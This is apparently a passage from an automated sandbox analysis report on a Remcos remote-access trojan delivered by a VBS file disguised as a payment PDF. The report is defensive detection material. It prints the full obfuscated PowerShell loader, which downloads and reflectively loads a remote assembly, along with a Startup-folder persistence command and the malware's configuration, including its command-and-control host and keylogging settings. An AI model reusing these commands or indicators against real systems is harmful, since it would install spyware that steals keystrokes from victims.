yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.e
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", CommandLine|base64offset|contains: H R", Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", ProcessId: 5664, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.e
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", CommandLine|base64offset|contains: H R", Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", ProcessId: 5664, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2260, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')'), ProcessId: 6200, ProcessName: powershell.exe
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2V

                Stealing of Sensitive Information

                barindex
                Source: Registry Key setAuthor: Joe Security: Data: Details: 25 B5 35 5D 71 78 89 5F A3 8B 32 5A 9C 34 44 24 F2 31 87 D1 49 F1 67 8C 3E 7B 64 62 6A 82 26 82 CD AA 35 59 50 E7 54 26 73 71 38 44 9E C2 39 ED 15 0B 87 B6 86 65 DE 5C 6A 68 D8 92 4C 86 05 6C 9B 15 46 42 30 4E 0F 05 71 B8 11 A2 E4 A0 78 71 10 87 E8 26 F8 41 00 41 A0 CB C3 7A 62 33 BB AF A8 7A E6 2A 1C CE 4D BE FA 88 AF 4E 1C 35 B1 70 FC DC B0 6D 77 5C 4A 03 3A B3 31 DF 75 C8 5B 8E 14 F7 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 6308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-YJH0WY\exepath
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:52:27.373866+020020204231Exploit Kit Activity Detected188.114.97.3443192.168.2.549761TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:52:27.373866+020020204251Exploit Kit Activity Detected188.114.97.3443192.168.2.549761TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:52:05.598588+020020365941Malware Command and Control Activity Detected192.168.2.55000564.188.16.15735890TCP
                2024-10-07T14:52:49.343623+020020365941Malware Command and Control Activity Detected192.168.2.54977264.188.16.15735890TCP
                2024-10-07T14:53:11.706900+020020365941Malware Command and Control Activity Detected192.168.2.54992064.188.16.15735890TCP
                2024-10-07T14:53:34.063069+020020365941Malware Command and Control Activity Detected192.168.2.54999964.188.16.15735890TCP
                2024-10-07T14:53:56.471791+020020365941Malware Command and Control Activity Detected192.168.2.55000164.188.16.15735890TCP
                2024-10-07T14:54:18.849461+020020365941Malware Command and Control Activity Detected192.168.2.55000364.188.16.15735890TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T14:52:27.199802+020028410751Malware Command and Control Activity Detected192.168.2.549761188.114.97.3443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ab9001.ddns.net:35890:1", "Assigned name": "NEWS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "vlc.exe", "Startup value": "reg", "Hide file": "Disable", "Mutex": "Rmc-YJH0WY", "Keylog flag": "1", "Keylog path": "User Profile", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3435406338.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3436141535.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6308, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004315EC
                Source: powershell.exe, 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_dd59bcd0-b
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2377012915.00007FF848800000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
